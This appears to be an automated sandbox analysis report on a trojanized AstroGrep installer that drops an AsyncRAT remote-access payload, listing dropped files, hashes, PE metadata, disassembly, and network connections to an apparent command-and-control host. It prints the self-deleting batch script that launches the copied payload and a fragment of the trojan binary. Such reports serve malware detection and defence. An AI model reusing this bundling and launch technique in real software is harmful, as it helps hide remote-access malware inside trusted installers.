Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):18330
Entropy (8bit):4.736471809051081
Encrypted:false
SSDEEP:384:lq2PmwEPb6k1iAVX/dUY2ZrEGMOZt7o0sDTj:lzuVLiY+rTZo0sDTj
MD5:1324A1677693CF2A399CC9424C756CC3
SHA1:2F29E68AB545965C401A12CE4783F7314E658AF3
SHA-256:A4BD518E7F66B63A62035C0C542B5F3287BAF7138E13A0F6A30781D8730D766A
SHA-512:2FD47275325B3605A9B982704BABFAD72D5AF3048064C66554F00F4D4D264DF252697F1D52733F6C87FBB3927A9FDD48ACF94B2E9475FD52334EFA12EA9F0B5A
Malicious:false
Preview: .. GNU GENERAL PUBLIC LICENSE.... Version 2, June 1991.... Copyright (C) 1989, 1991 Free Software Foundation, Inc... 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.. Everyone is permitted to copy and distribute verbatim copies.. of this license document, but changing it is not allowed........ Preamble.... The licenses for most software are designed to take away your..freedom to share and change it. By contrast, the GNU General Public..License is intended to guarantee your freedom to share and change free..software--to make sure the software is free for all its users. This..General Public License applies to most of the Free Software..Foundation's software and to any other program whose authors commit to..using it. (Some other Free Software Foundation software is covered by..the GNU Library General Public License instead.) You can apply it to..your programs, too..... When we speak of free software, we are referring to freedom, not..price. Our General Publi
C:\Program Files (x86)\AstroGrep\readme.txt
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1834
Entropy (8bit):4.931632926415765
Encrypted:false
SSDEEP:24:CGEEY1zF17X+B41FcMEEn+0MJ/cIr3EQZ1WrT5M5tmZNijpibbCT32yvosGQC:tYFFN+B41eM2UvQL0T1Fzy/GZ
MD5:ABE9A78B3FD8ECD7409C2B382820134E
SHA1:9AEC458EA30060EE633BD25D235C02AAEFF989D1
SHA-256:B17BBDB71C888116A8661B373CA088C9B174E00551DF81B887EE9BCA28492189
SHA-512:0F554B3BA4749B22728D303B7AC1BD7596CCAE5A51D0F06560AA829222DD5DFF31F089C2D5894A23D97093836A76595EA5BAA4441EAC4DF44C321F14CD554A3D
Malicious:false
Preview: .Changelog for AstroGrep v4.4.7..===================================================================..Bugs..-85: Possible issue with word plugin and leaving winword.exe process open...-98: Error "the string was not recognized as a valid DateTime"..-100: Performance issues..-101: Searching Multiple MS Word Documents..-102: Context Lines Display Discrepancy..-103: Astrogrep 4.4.6 hangs clicking on found file..-104: commandline spath not accepting multiple searchPath..-108: Used ListSeparator on right mouse "Copy all"..-109: Command Line issues - Check logic and docs..-113: Feature 108 is not working (Add additional text editor parameter for search text)....Featured Requests:..-101: Stopped painting status bar as often..-110: Exclude directories that do not match pattern (added not equals option for path based options)..-119: Added line hit count to count column values (format: total / line in current Count column)..-122: Add option to only show x chars before/.after matched text..-12
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep\AstroGrep.lnk
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Apr 4 19:57:44 2019, mtime=Sun Jul 18 04:37:27 2021, atime=Thu Apr 4 19:57:44 2019, length=573440, window=hide
Category:dropped
Size (bytes):1110
Entropy (8bit):4.634964714009965
Encrypted:false
SSDEEP:24:8mQzdPRmdOEop//OVlOUA7Ly5SdfmvdfvQUUtU7aB6m:8mcPRmdOrN/ClOj7Ly5SdfmvdfvFqxB6
MD5:4E02F0D58593649DB109E42966511216
SHA1:1F261578B7374A22C5727AFBA3CEDE9C8827990C
SHA-256:9969E124D26F04D61C2BC62A9109C720B4826DF21EB92ADD4206FA52BE3B341B
SHA-512:1CB19D3FF59E0A6773424B7CD5204F75BCCAE1A90D923F5E9A40E7381D12722A5480B68F65D731C6E18E167EC9FC7854F746DADD2ED6A67CAEB380603B5FD7B7
Malicious:false
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AstroGrep\Uninstall AstroGrep.lnk
Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Jul 18 04:37:27 2021, mtime=Sun Jul 18 04:37:27 2021, atime=Sun Jul 18 04:37:27 2021, length=61854, window=hide
Category:dropped
Size (bytes):1110
Entropy (8bit):4.665663359768743
Encrypted:false
SSDEEP:24:8m1aRvdOEopF/g+taHfUA7LMdfOhgdfvQUUKj7aB6m:8m1aRvdOrf/g+taHfj7LMdfOhgdfvFND
MD5:F26EA75861C05D224B5375D6BF24E6FE
SHA1:F21F56ADF6987A9A8E5A269817A4BC8574C78AF3
SHA-256:BC15264E99D05B6459DEC01BBF8D55AEAD2E6CDBC166EE0578F217E350E3CA90
SHA-512:9D5F1CFB1E8EF08D2D8F00D8F9B418C2AB820D09C417A50A1162F6029BA090D0E3A6D05AA1C313E152030D244520697D7BC4F3A5D5C9E73357BBA46A0E126251
Malicious:false
                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ASTRO-GREP.EXE.log
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):614
                                                                                                          Entropy (8bit):5.330897468506462
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhaxzAbDLI4Mq92n4M6:ML9E4Ks2wKDE4KhK3VZ9pKhmsXE4x84j
                                                                                                          MD5:A4395C8F90A59E4CC7F7923D8BDE437C
                                                                                                          SHA1:A8E9EBD5CDF81E720979E795391EF2440CE5DA4A
                                                                                                          SHA-256:F84DFD4D4F8BA0113ED2C0394868B1E4C8F83850DE051FA599621098C190FE6E
                                                                                                          SHA-512:7F1F159667C7F4A9E60E272DF00A2D33A72816F35FEF1DAD37F17B089E506D1CCC0350D569690230F53A44DB49FFDB81BC6E47B7F96BB4469395926F3BC953D3
                                                                                                          Malicious:false
                                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                          C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
                                                                                                          Process:C:\Users\user\Desktop\ms.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):48640
                                                                                                          Entropy (8bit):5.561770945961325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:quCFNTAolrhWU5TeLmo2qrJW6K8e2gaM9PIItc5pIX0byDBm1ERjvmFq+YBDZsx:quCFNTA2G2d6K5aM6Itc5pIEbyAqRzyX
                                                                                                          MD5:432F0E0AAB658DE046D8B41D2CEF8253
                                                                                                          SHA1:7BA5B175FFB4BB976C54177F9C40A7339A088654
                                                                                                          SHA-256:17D1C0045155AD9C523C07E0F37AA16CD036915F38B73090D8D8BA930DB149FB
                                                                                                          SHA-512:BAC97805D8FCBA49B7BDE5067911B293622C610A65F2A2FC527A6C890BE8E79C6CA9C9676786B1EAAC19ECBDB16562EFEE2D7C985707FC04E57E4E3033C75B0B
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          Process:C:\Users\user\Desktop\ms.exe
                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Category:dropped
                                                                                                          Size (bytes):950654
                                                                                                          Entropy (8bit):7.974042856320811
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:2MhCG3sDOdqnRrLVvjD9puJ7li2OLUC0Dc/rP0flxwg:AG3sJpRvjhU7I2OLZD/LUr7
                                                                                                          MD5:A708211241313FEAF9621E571631534D
                                                                                                          SHA1:9F398E0CC5B2B5162D5F27A6653709F836D02998
                                                                                                          SHA-256:5C4FAEBE335FEE04B25B10AA2A0E580571388BDE2CC09E133C72D9D01BC09423
                                                                                                          SHA-512:8E2FA5F33E16879D8F5ACB4AB783AA4B4B37266CD1346ABEF5D54F2DFEB2177AF872575780E2E7CD02E462349B1C35642C0F7BA3F860034775A064E9A07B08AF
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: Metadefender, Detection: 5%, Browse
                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq211B.tmp\LangDLL.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5632
                                                                                                          Entropy (8bit):3.936685359308878
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:im1qsjq8W2MPUptuMMFvx/om/ycNSCwVGfOY0vB6/JvR0Jvof5d2D:F1iBl91Z7/ycNSCwV8TLZR0gd2
                                                                                                          MD5:91D5E21907E4BAFF0145339311ABF9D9
                                                                                                          SHA1:F867D8529D4F3704CD4F475B46699B66CB6C2002
                                                                                                          SHA-256:ACDE373CC4916BE5DF3D239AB67F5980C333E979F34965EE733E7C6259586E9B
                                                                                                          SHA-512:339E35B89F2AC7D2FBE9DFD9A55279D20463F7C298332810C0EBAA5DE95E09657F4B2837904AE16A8743C4C7ABF7F3C7581099BC94312C178A21783288790401
                                                                                                          Malicious:false
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq211B.tmp\StartMenu.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7680
                                                                                                          Entropy (8bit):4.616039420427882
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:HgiqVPb3X8K8Kdr3gEq6nNdMk6Qiw290+q6LDtJ1tU3hhEl7y:HgiqVPgK8K9eIdE9B/tMhg7
                                                                                                          MD5:9CE20025DEF637F7BE257FA96D25ED05
                                                                                                          SHA1:CFEE47F72804FFACD06C2254A5F8DCF47373F9D4
                                                                                                          SHA-256:4B17C914DC40EBA477B653715F07CE9ED9B2EF4A1264A1DAFD624EB289474243
                                                                                                          SHA-512:AFCE99F1BD803E1B744E33302BA2C85C1122487F2BDF006CA433FE93DB2778A6D68D239D927CE7149443F411A12A4FAC2195D6D01AEC4071C71B8F332C96BDFB
                                                                                                          Malicious:false
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq211B.tmp\System.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11264
                                                                                                          Entropy (8bit):5.770824470205811
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:PPtkumJX7zB22kGwfy0mtVgkCPOs81un:E702k5qpds8Qn
                                                                                                          MD5:B8992E497D57001DDF100F9C397FCEF5
                                                                                                          SHA1:E26DDF101A2EC5027975D2909306457C6F61CFBD
                                                                                                          SHA-256:98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
                                                                                                          SHA-512:8823B1904DCCFAF031068102CB1DEF7958A057F49FF369F0E061F1B4DB2090021AA620BB8442A2A6AC9355BB74EE54371DC2599C20DC723755A46EDE81533A3C
                                                                                                          Malicious:false
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq211B.tmp\modern-wizard.bmp
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PC bitmap, Windows 3.x format, 164 x 314 x 4
                                                                                                          Category:dropped
                                                                                                          Size (bytes):52988
                                                                                                          Entropy (8bit):1.9568109962493656
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Qoi47a5G8SddzKFIcsOz3XMoi47a5G8SddzKFIcsOz3Xz:QonoGNd03IonoGNd03/
                                                                                                          MD5:E39731A71ED38499AC6B8E51E8E58E34
                                                                                                          SHA1:F2820C783906CD4F06040B6850856D426519CE15
                                                                                                          SHA-256:A94EF9A36E53192F26D5118F0232B6D7F70943B3CF5A7DF6340A139A226D207B
                                                                                                          SHA-512:F807ED5BE0297462777A82B79D1AAC35CB4FF5FA54DE4D446050A8BB08677488072685A982BFF5A900823C5727196C05EF29B3EEB6ABCD17171C0EF7C3765270
                                                                                                          Malicious:false
                                                                                                          C:\Users\user\AppData\Local\Temp\nsq211B.tmp\nsDialogs.dll
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9728
                                                                                                          Entropy (8bit):5.066422293646434
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:oU2qZ4zC5RH3cXX1LlYlRowycxM2DjDf3GEst+Nt+jvDYx4HpqndYHnxss:oU2q+CP3uKrpyREs06YxqodGn
                                                                                                          MD5:70D4C5F9ACC5DDF934B73FA311ADE7D8
                                                                                                          SHA1:6962E84782B0E1FE798CDCE1D7447211228CA85B
                                                                                                          SHA-256:02869B76936E3C3102BB36E34B41BC989770BF81DCA09F31C561BB6BE52285EE
                                                                                                          SHA-512:40189B463173CBBAD9C5101F37B4A37D970E9CD8E6F3D343CB8E54C54BDC7FDC3CFA8D7D7E7B7B0241C68768607C523BE2C2C21B7EFC727257731E1C5D1673FC
                                                                                                          Malicious:false
                                                                                                          C:\Users\user\AppData\Local\Temp\tmp7B21.tmp.bat
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):154
                                                                                                          Entropy (8bit):5.114193705430011
                                                                                                          Encrypted:false
SSDEEP: 3:mKDDCMNqTtvL5oWXp5cViEaKC50XVASmqRDWXp5cViE2J5xAInTRI4XSu7ZPy:hWKqTtT6WXp+NaZ50lbmq1WXp+N23fT+
MD5: 005C284BFAC71599AEEDBFFA742E1D45
SHA1: 514D841D9D5C3A86E5A7AB8D77312156980F08E6
SHA-256: B6D37A30E712121D18DE29C69F9289DB416F87298E031A9BCD103FF2EC8C2C87
SHA-512: 2A5FC7C31D1A62D638F4A8190573458AFF36F0DE37D392DEB932A5A46639475FDC1A9D29AD675B6F74301A5C2E2F4679B67B274313469248CFE312D743F90F6C
Malicious: false
Preview: @echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\astro-grep.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp7B21.tmp.bat" /f /q..

C:\Users\user\AppData\Roaming\astro-grep.exe
Process: C:\Users\user\AppData\Local\Temp\ASTRO-GREP.EXE
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 48640
Entropy (8bit): 5.561770945961325
Encrypted: false
SSDEEP: 768:quCFNTAolrhWU5TeLmo2qrJW6K8e2gaM9PIItc5pIX0byDBm1ERjvmFq+YBDZsx:quCFNTA2G2d6K5aM6Itc5pIEbyAqRzyX
MD5: 432F0E0AAB658DE046D8B41D2CEF8253
SHA1: 7BA5B175FFB4BB976C54177F9C40A7339A088654
SHA-256: 17D1C0045155AD9C523C07E0F37AA16CD036915F38B73090D8D8BA930DB149FB
SHA-512: BAC97805D8FCBA49B7BDE5067911B293622C610A65F2A2FC527A6C890BE8E79C6CA9C9676786B1EAAC19ECBDB16562EFEE2D7C985707FC04E57E4E3033C75B0B
Malicious: true
Yara Hits:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\astro-grep.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^................................. ........@.. ....................... ............@.................................T...W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........Y..Xv.............................................................V..;...$0.xC.=VD..b......9A../.\.....(....*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.......*.~....*.~....*.......*.~....*.......*.~....*.......**.(>......*2~.....o?...*.s.........*.()...:(...(*...:....(+...:....('...:....((...9.....(v...*V(....s.... ...o....*n~....9....~....o..........*~~....(....9....(0...9....(@...*Vr.%.p~....(o....#...*.s...
\Device\Null
Process: C:\Windows\SysWOW64\timeout.exe
File Type: ASCII text, with CRLF line terminators, with overstriking
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.41440934524794
Encrypted: false
SSDEEP: 3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5: 3DD7DD37C304E70A7316FE43B69F421F
SHA1: A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256: 4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512: 713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious: false
Preview: ..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.869948492165745
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ms.exe
File size: 1068032
MD5: dbbb611daf3abd47972ae4faf5d54c95
SHA1: 1b33772f2acc9e6673a2922587b00db86f5fba01
SHA256: d5a8b6cb7b39d6f71ce67c6c8e17030079f2778087ee12c0ad45bd823f7bd53c
SHA512: 140b2d0d6ac049943f5f2c8e3bfa7ca1ad773b0878cf92f825baa2769930d068b6b2601786f94f40daf15f199b2cb9b6ce6c016130025e5f04a103ee78b06bb9
SSDEEP: 24576:jmclmMhCG3sDOdqnRrLVvjD9puJ7li2OLUC0Dc/rP0flxwy:jmzG3sJpRvjhU7I2OLZD/LUr
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F..Q............m.>.....m...F...m.........3.........V...m.......m.=.....Rich............................PE..L....0.N...........

File Icon

Icon Hash: e0d08cf8d8ccc8e0

Static PE Info

General

Entrypoint: 0x403248
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x4E1030C0 [Sun Jul 3 09:05:04 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 9222d372923baed7aa9dfa28449a94ea

Entrypoint Preview

Instruction
call 00007F1D84AFA47Bh
jmp 00007F1D84AF83DEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040920Ch
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F1D84AF855Eh
test byte ptr [eax], 00000008h
je 00007F1D84AF8559h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [00409058h]
leave
retn 0008h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0040DDD8h], eax
mov dword ptr [0040DDD4h], ecx
mov dword ptr [0040DDD0h], edx
mov dword ptr [0040DDCCh], ebx
mov dword ptr [0040DDC8h], esi
mov dword ptr [0040DDC4h], edi
mov word ptr [0040DDF0h], ss
mov word ptr [0040DDE4h], cs
mov word ptr [0040DDC0h], ds
mov word ptr [0040DDBCh], es
mov word ptr [0040DDB8h], fs
mov word ptr [0040DDB4h], gs
pushfd
pop dword ptr [0040DDE8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0040DDDCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0040DDE0h], eax
lea eax, dword ptr [ebp+08h]

Rich Headers

Programming Language:
• [ASM] VS2010 build 30319
• [LNK] VS2010 build 30319
• [ C ] VS2010 build 30319
• [IMP] VS2008 SP1 build 30729
• [C++] VS2010 build 30319

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbb04 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0xf78fc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x107000 | 0x9e4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9160 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb248 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x124 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7842 | 0x7a00 | False | 0.589491547131 | data | 6.48776813349 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x9000 | 0x319e | 0x3200 | False | 0.35390625 | data | 4.92389239742 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xd000 | 0x1a84 | 0xe00 | False | 0.215401785714 | data | 2.57332081688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0xf000 | 0xf78fc | 0xf7a00 | False | 0.948167749874 | data | 7.91789788584 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x107000 | 0x13aa | 0x1400 | False | 0.4107421875 | data | 4.12102642331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RBIND | 0xf330 | 0xbe00 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | |
RBIND | 0x1b130 | 0xe817e | PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive | |
RT_ICON | 0x1032b0 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x1033d8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x103940 | 0x2e8 | data | English | United States
RT_ICON | 0x103c28 | 0x8a8 | data | English | United States
RT_ICON | 0x1044d0 | 0xea8 | data | English | United States
RT_ICON | 0x105378 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x1057e0 | 0x10a8 | data | English | United States
RT_RCDATA | 0x106888 | 0x6 | ASCII text, with no line terminators | |
RT_RCDATA | 0x106890 | 0x1 | very short file (no magic) | |
RT_GROUP_ICON | 0x106894 | 0x68 | data | English | United States

Imports

DLL | Import
KERNEL32.dll | CreateFileA, FindResourceA, FreeLibrary, LoadResource, WriteFile, SizeofResource, GetProcAddress, LoadLibraryA, LockResource, EnumResourceNamesA, CloseHandle, FreeResource, GetWindowsDirectoryA, OutputDebugStringA, GetTempPathA, GetModuleHandleW, ExitProcess, DecodePointer, EncodePointer, GetCommandLineA, HeapSetInformation, GetStartupInfoW, RaiseException, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, LoadLibraryW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetStdHandle, GetModuleFileNameW, Sleep, HeapSize, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapReAlloc, LCMapStringW, MultiByteToWideChar, GetStringTypeW
SHELL32.dll | ShellExecuteA, SHGetSpecialFolderPathA

Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 17, 2021 22:37:53.508532047 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:37:53.549875021 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:53.550003052 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:37:53.573781967 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:37:53.615372896 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:53.622695923 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:53.622736931 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:53.622780085 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:53.622852087 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:37:53.627290964 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:37:53.669157028 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:53.669414043 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:53.721821070 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:37:53.741940975 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:37:53.783473015 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:54.103178978 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:54.103368998 CEST | 443 | 49727 | 104.23.98.190 | 192.168.2.3
Jul 17, 2021 22:37:54.103446960 CEST | 49727 | 443 | 192.168.2.3 | 104.23.98.190
Jul 17, 2021 22:37:54.106720924 CEST | 49728 | 57667 | 192.168.2.3 | 185.195.232.251
Jul 17, 2021 22:37:54.160128117 CEST | 57667 | 49728 | 185.195.232.251 | 192.168.2.3
Jul 17, 2021 22:37:54.675015926 CEST | 49728 | 57667 | 192.168.2.3 | 185.195.232.251
Jul 17, 2021 22:37:54.728519917 CEST | 57667 | 49728 | 185.195.232.251 | 192.168.2.3
